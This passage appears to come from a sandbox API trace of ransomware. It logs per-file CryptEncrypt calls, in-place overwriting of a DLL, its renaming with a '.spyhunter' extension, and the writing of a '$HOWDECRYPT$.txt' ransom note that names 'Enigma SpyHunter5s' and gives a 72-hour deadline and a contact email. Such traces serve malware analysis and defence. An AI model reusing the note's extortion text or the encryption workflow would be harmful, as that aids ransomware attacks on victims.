pdwDataLen=0x57e4c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4c0*=0x30) returned 1 [0177.425] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.426] GetProcessHeap () returned 0x2c0000 [0177.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.426] GetProcessHeap () returned 0x2c0000 [0177.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eea2a0 | out: hHeap=0x2c0000) returned 1 [0177.426] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4c8 | out: pbBuffer=0x57e4c8) returned 1 [0177.426] GetProcessHeap () returned 0x2c0000 [0177.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.426] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4c0*=0x30) returned 1 [0177.426] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.426] GetProcessHeap () returned 0x2c0000 [0177.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.426] GetProcessHeap () returned 0x2c0000 [0177.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eea1b8 | out: hHeap=0x2c0000) returned 1 [0177.426] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4c0 | out: pbBuffer=0x57e4c0) returned 1 [0177.426] GetProcessHeap () returned 0x2c0000 [0177.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.427] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4b8*=0x30) returned 1 [0177.427] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdasqlr.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\msdasqlr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.427] GetProcessHeap () returned 0x2c0000 [0177.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.427] GetProcessHeap () returned 0x2c0000 [0177.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eea0d0 | out: hHeap=0x2c0000) returned 1 [0177.427] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4c0 | out: pbBuffer=0x57e4c0) returned 1 [0177.427] GetProcessHeap () returned 0x2c0000 [0177.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.427] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4b8*=0x30) returned 1 [0177.427] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\msdaorar.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\msdaorar.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.427] GetProcessHeap () returned 0x2c0000 [0177.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.427] GetProcessHeap () returned 0x2c0000 [0177.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee9fe8 | out: hHeap=0x2c0000) returned 1 [0177.427] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4b8 | out: pbBuffer=0x57e4b8) returned 1 [0177.427] GetProcessHeap () returned 0x2c0000 [0177.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.427] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4b0*=0x30) returned 1 [0177.428] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.428] GetProcessHeap () returned 0x2c0000 [0177.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.428] GetProcessHeap () returned 0x2c0000 [0177.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf628 | out: hHeap=0x2c0000) returned 1 [0177.428] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4b8 | out: pbBuffer=0x57e4b8) returned 1 [0177.428] GetProcessHeap () returned 0x2c0000 [0177.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.428] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4b0*=0x30) returned 1 [0177.428] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.428] GetProcessHeap () returned 0x2c0000 [0177.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.428] GetProcessHeap () returned 0x2c0000 [0177.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf560 | out: hHeap=0x2c0000) returned 1 [0177.428] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4b0 | out: pbBuffer=0x57e4b0) returned 1 [0177.428] GetProcessHeap () returned 0x2c0000 [0177.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.428] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4a8*=0x30) returned 1 [0177.428] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.429] GetProcessHeap () returned 0x2c0000 [0177.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.429] GetProcessHeap () returned 0x2c0000 [0177.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf498 | out: hHeap=0x2c0000) returned 1 [0177.429] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0177.430] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0177.430] WriteFile (in: hFile=0x9c, lpBuffer=0x57e3e3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e50c, lpOverlapped=0x0 | out: lpBuffer=0x57e3e3*, lpNumberOfBytesWritten=0x57e50c*=0x127, lpOverlapped=0x0) returned 1 [0177.430] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0177.430] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e50c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e50c*=0x2ac, lpOverlapped=0x0) returned 1 [0177.430] CloseHandle (hObject=0x9c) returned 1 [0177.431] GetProcessHeap () returned 0x2c0000 [0177.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4710 | out: hHeap=0x2c0000) returned 1 [0177.431] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4a8 | out: pbBuffer=0x57e4a8) returned 1 [0177.431] GetProcessHeap () returned 0x2c0000 [0177.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.431] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4a0*=0x30) returned 1 [0177.431] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\System\\ado\\en-US\\msader15.dll.mui" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\en-us\\msader15.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.431] GetProcessHeap () returned 0x2c0000 [0177.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.431] GetProcessHeap () returned 0x2c0000 [0177.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4630 | out: hHeap=0x2c0000) returned 1 [0177.431] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4a8 | out: pbBuffer=0x57e4a8) returned 1 [0177.431] GetProcessHeap () returned 0x2c0000 [0177.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.431] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4a0*=0x30) returned 1 [0177.431] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UNT" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.unt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.433] GetProcessHeap () returned 0x2c0000 [0177.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.433] GetProcessHeap () returned 0x2c0000 [0177.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7ef8 | out: hHeap=0x2c0000) returned 1 [0177.434] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4a0 | out: pbBuffer=0x57e4a0) returned 1 [0177.434] GetProcessHeap () returned 0x2c0000 [0177.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.434] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e498*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e498*=0x30) returned 1 [0177.434] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UDT" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.udt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.435] GetProcessHeap () returned 0x2c0000 [0177.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.435] GetProcessHeap () returned 0x2c0000 [0177.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7de0 | out: hHeap=0x2c0000) returned 1 [0177.435] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4a0 | out: pbBuffer=0x57e4a0) returned 1 [0177.435] GetProcessHeap () returned 0x2c0000 [0177.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.435] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e498*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e498*=0x30) returned 1 [0177.436] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.TTS" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.tts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.437] GetProcessHeap () returned 0x2c0000 [0177.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.437] GetProcessHeap () returned 0x2c0000 [0177.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee17e8 | out: hHeap=0x2c0000) returned 1 [0177.437] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e498 | out: pbBuffer=0x57e498) returned 1 [0177.437] GetProcessHeap () returned 0x2c0000 [0177.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.437] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e490*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e490*=0x30) returned 1 [0177.437] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.LTS" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.lts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.439] GetProcessHeap () returned 0x2c0000 [0177.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.439] GetProcessHeap () returned 0x2c0000 [0177.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee2f28 | out: hHeap=0x2c0000) returned 1 [0177.439] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e498 | out: pbBuffer=0x57e498) returned 1 [0177.439] GetProcessHeap () returned 0x2c0000 [0177.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.439] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e490*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e490*=0x30) returned 1 [0177.439] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.IDX" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.idx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.441] GetProcessHeap () returned 0x2c0000 [0177.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.441] GetProcessHeap () returned 0x2c0000 [0177.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee2cf8 | out: hHeap=0x2c0000) returned 1 [0177.441] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e490 | out: pbBuffer=0x57e490) returned 1 [0177.441] GetProcessHeap () returned 0x2c0000 [0177.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.441] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e488*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e488*=0x30) returned 1 [0177.441] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CSD" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.csd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.442] GetProcessHeap () returned 0x2c0000 [0177.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.442] GetProcessHeap () returned 0x2c0000 [0177.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee2e10 | out: hHeap=0x2c0000) returned 1 [0177.442] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e490 | out: pbBuffer=0x57e490) returned 1 [0177.442] GetProcessHeap () returned 0x2c0000 [0177.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.443] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e488*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e488*=0x30) returned 1 [0177.443] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CRT" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.crt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.444] GetProcessHeap () returned 0x2c0000 [0177.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.444] GetProcessHeap () returned 0x2c0000 [0177.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee3a18 | out: hHeap=0x2c0000) returned 1 [0177.444] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e488 | out: pbBuffer=0x57e488) returned 1 [0177.444] GetProcessHeap () returned 0x2c0000 [0177.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.444] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e480*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e480*=0x30) returned 1 [0177.444] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.APL" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.apl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.446] GetProcessHeap () returned 0x2c0000 [0177.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.446] GetProcessHeap () returned 0x2c0000 [0177.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee3900 | out: hHeap=0x2c0000) returned 1 [0177.446] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e488 | out: pbBuffer=0x57e488) returned 1 [0177.446] GetProcessHeap () returned 0x2c0000 [0177.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0177.446] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e480*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e480*=0x30) returned 1 [0177.446] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0177.447] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL") returned 98 [0177.447] StrStrW (lpFirst="FPSRVUTL.DLL", lpSrch=".txt") returned 0x0 [0177.447] GetProcessHeap () returned 0x2c0000 [0177.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0177.447] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e444, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e444*=0x2800, lpOverlapped=0x0) returned 1 [0177.590] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.590] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e444, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e444*=0x2800, lpOverlapped=0x0) returned 1 [0177.590] GetProcessHeap () returned 0x2c0000 [0177.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0177.590] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.590] WriteFile (in: hFile=0x178, lpBuffer=0x57e484*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e444, lpOverlapped=0x0 | out: lpBuffer=0x57e484*, lpNumberOfBytesWritten=0x57e444*=0x4, lpOverlapped=0x0) returned 1 [0177.729] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e444, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e444*=0x30, lpOverlapped=0x0) returned 1 [0177.729] CloseHandle (hObject=0x178) returned 1 [0177.735] GetProcessHeap () returned 0x2c0000 [0177.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.735] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.spyhunter") returned 108 [0177.735] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll.spyhunter")) returned 1 [0177.738] GetProcessHeap () returned 0x2c0000 [0177.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.738] GetProcessHeap () returned 0x2c0000 [0177.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0177.738] GetProcessHeap () returned 0x2c0000 [0177.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee36d0 | out: hHeap=0x2c0000) returned 1 [0177.738] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft 